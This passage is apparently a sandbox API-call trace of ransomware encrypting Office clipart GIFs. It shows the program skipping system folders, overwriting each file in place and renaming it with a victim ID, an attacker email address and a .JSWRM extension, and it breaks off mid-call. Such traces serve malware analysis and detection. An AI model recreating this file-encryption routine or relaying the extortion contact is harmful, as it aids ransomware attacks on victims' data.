lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110ef705, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110ef705, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15fa, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02106_.GIF", cAlternateFileName="")) returned 1 [0100.083] lstrcmpiW (lpString1="WB02106_.GIF", lpString2=".") returned 1 [0100.083] lstrcmpiW (lpString1="WB02106_.GIF", lpString2="..") returned 1 [0100.083] lstrcmpiW (lpString1="WB02106_.GIF", lpString2="...") returned 1 [0100.083] lstrcmpiW (lpString1="WB02106_.GIF", lpString2="windows") returned -1 [0100.083] lstrcmpiW (lpString1="WB02106_.GIF", lpString2="recovery") returned 1 [0100.083] lstrcmpiW (lpString1="WB02106_.GIF", lpString2="perflogs") returned 1 [0100.083] lstrcmpiW (lpString1="WB02106_.GIF", lpString2="documents and settings") returned 1 [0100.083] lstrcmpiW (lpString1="WB02106_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.083] lstrcmpiW (lpString1="WB02106_.GIF", lpString2="system volume information") returned 1 [0100.083] lstrcmpiW (lpString1="WB02106_.GIF", lpString2="msocache") returned 1 [0100.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0100.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02106_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02106_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02106_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0100.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0100.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02106_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02106_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02106_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0100.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0100.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0100.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0100.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02106_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.084] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5626) returned 1 [0100.084] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15f0) returned 0x24d210 [0100.084] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x15f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x15f0, lpOverlapped=0x0) returned 1 [0100.093] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.093] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x15f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x15f0, lpOverlapped=0x0) returned 1 [0100.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.093] CloseHandle (hObject=0x338) returned 1 [0100.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0100.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0100.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0100.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0100.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0100.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0100.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.093] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02106_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02106_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0100.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0100.095] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1113bba3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1113bba3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ef, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02116_.GIF", cAlternateFileName="")) returned 1 [0100.095] lstrcmpiW (lpString1="WB02116_.GIF", lpString2=".") returned 1 [0100.095] lstrcmpiW (lpString1="WB02116_.GIF", lpString2="..") returned 1 [0100.095] lstrcmpiW (lpString1="WB02116_.GIF", lpString2="...") returned 1 [0100.095] lstrcmpiW (lpString1="WB02116_.GIF", lpString2="windows") returned -1 [0100.095] lstrcmpiW (lpString1="WB02116_.GIF", lpString2="recovery") returned 1 [0100.095] lstrcmpiW (lpString1="WB02116_.GIF", lpString2="perflogs") returned 1 [0100.095] lstrcmpiW (lpString1="WB02116_.GIF", lpString2="documents and settings") returned 1 [0100.095] lstrcmpiW (lpString1="WB02116_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.095] lstrcmpiW (lpString1="WB02116_.GIF", lpString2="system volume information") returned 1 [0100.096] lstrcmpiW (lpString1="WB02116_.GIF", lpString2="msocache") returned 1 [0100.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02116_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02116_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02116_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0100.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02116_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02116_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02116_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0100.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0100.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0100.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02116_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.097] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1007) returned 1 [0100.097] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3e0) returned 0x230a00 [0100.097] ReadFile (in: hFile=0x338, lpBuffer=0x230a00, nNumberOfBytesToRead=0x3e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x3e0, lpOverlapped=0x0) returned 1 [0100.098] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.098] WriteFile (in: hFile=0x338, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x3e0, lpOverlapped=0x0) returned 1 [0100.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0100.099] CloseHandle (hObject=0x338) returned 1 [0100.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0100.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0100.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0100.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0100.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.099] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02116_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02116_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0100.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0100.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.100] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110c9494, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110c9494, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110c9494, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x97f, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02134_.GIF", cAlternateFileName="")) returned 1 [0100.100] lstrcmpiW (lpString1="WB02134_.GIF", lpString2=".") returned 1 [0100.100] lstrcmpiW (lpString1="WB02134_.GIF", lpString2="..") returned 1 [0100.100] lstrcmpiW (lpString1="WB02134_.GIF", lpString2="...") returned 1 [0100.100] lstrcmpiW (lpString1="WB02134_.GIF", lpString2="windows") returned -1 [0100.100] lstrcmpiW (lpString1="WB02134_.GIF", lpString2="recovery") returned 1 [0100.100] lstrcmpiW (lpString1="WB02134_.GIF", lpString2="perflogs") returned 1 [0100.100] lstrcmpiW (lpString1="WB02134_.GIF", lpString2="documents and settings") returned 1 [0100.100] lstrcmpiW (lpString1="WB02134_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.100] lstrcmpiW (lpString1="WB02134_.GIF", lpString2="system volume information") returned 1 [0100.100] lstrcmpiW (lpString1="WB02134_.GIF", lpString2="msocache") returned 1 [0100.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0100.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02134_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02134_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02134_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0100.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0100.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02134_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02134_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02134_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0100.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0100.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0100.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02134_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.101] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2431) returned 1 [0100.101] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x970) returned 0x20c6c0 [0100.101] ReadFile (in: hFile=0x338, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x970, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x970, lpOverlapped=0x0) returned 1 [0100.103] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.103] WriteFile (in: hFile=0x338, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x970, lpOverlapped=0x0) returned 1 [0100.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0100.103] CloseHandle (hObject=0x338) returned 1 [0100.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0100.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0100.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0100.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0100.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.103] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02134_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02134_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0100.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0100.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.104] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110c9494, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x579, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02187_.GIF", cAlternateFileName="")) returned 1 [0100.104] lstrcmpiW (lpString1="WB02187_.GIF", lpString2=".") returned 1 [0100.104] lstrcmpiW (lpString1="WB02187_.GIF", lpString2="..") returned 1 [0100.104] lstrcmpiW (lpString1="WB02187_.GIF", lpString2="...") returned 1 [0100.104] lstrcmpiW (lpString1="WB02187_.GIF", lpString2="windows") returned -1 [0100.104] lstrcmpiW (lpString1="WB02187_.GIF", lpString2="recovery") returned 1 [0100.104] lstrcmpiW (lpString1="WB02187_.GIF", lpString2="perflogs") returned 1 [0100.104] lstrcmpiW (lpString1="WB02187_.GIF", lpString2="documents and settings") returned 1 [0100.104] lstrcmpiW (lpString1="WB02187_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.104] lstrcmpiW (lpString1="WB02187_.GIF", lpString2="system volume information") returned 1 [0100.104] lstrcmpiW (lpString1="WB02187_.GIF", lpString2="msocache") returned 1 [0100.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02187_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02187_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02187_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.105] HeapFree (in: 